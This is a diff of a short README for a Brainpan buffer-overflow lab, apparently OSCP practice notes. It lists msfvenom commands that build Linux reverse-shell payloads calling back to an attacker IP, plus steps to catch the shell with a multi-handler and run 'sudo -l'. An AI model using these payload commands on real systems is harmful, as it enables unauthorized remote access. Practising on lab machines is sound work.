infosecx0/brainpan_buffer_overflow/README.md

 use these exploits

-#msfvenom -p linux/shell_reverse_tcp LHOST=your.Kali.IP.address LPORT=4444 EXITFUNC=thread -f c -a x86 –platform linux -b “\x00”
 #msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.31.148 LPORT=1337 -f c -a x86 --platform linux -b "\x00" -e x86/shikata_ga_nai
-#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.31.148 LPORT=4444 EXITFUNC=thread –e x86/alpha_upper –b “\x00” -f c

-you got  a kali shell perfect
+you got  a kali shell perfect  coz i am running the downloaded exe in my kali . now its time to execute it on the actual target

 now change the address of breainpain machine as 192.168.31.149

-send you got a shell but not first time with nc so try multi handler
+send you got a shell but not first time with nc

+so try multi handler
+( protip : -- its allowed in OSCP if you are in fear not to use only meterperter is used at once -- other wise multihandler , msfvenom , auxilary you can use,also scripts )

 type sudo -l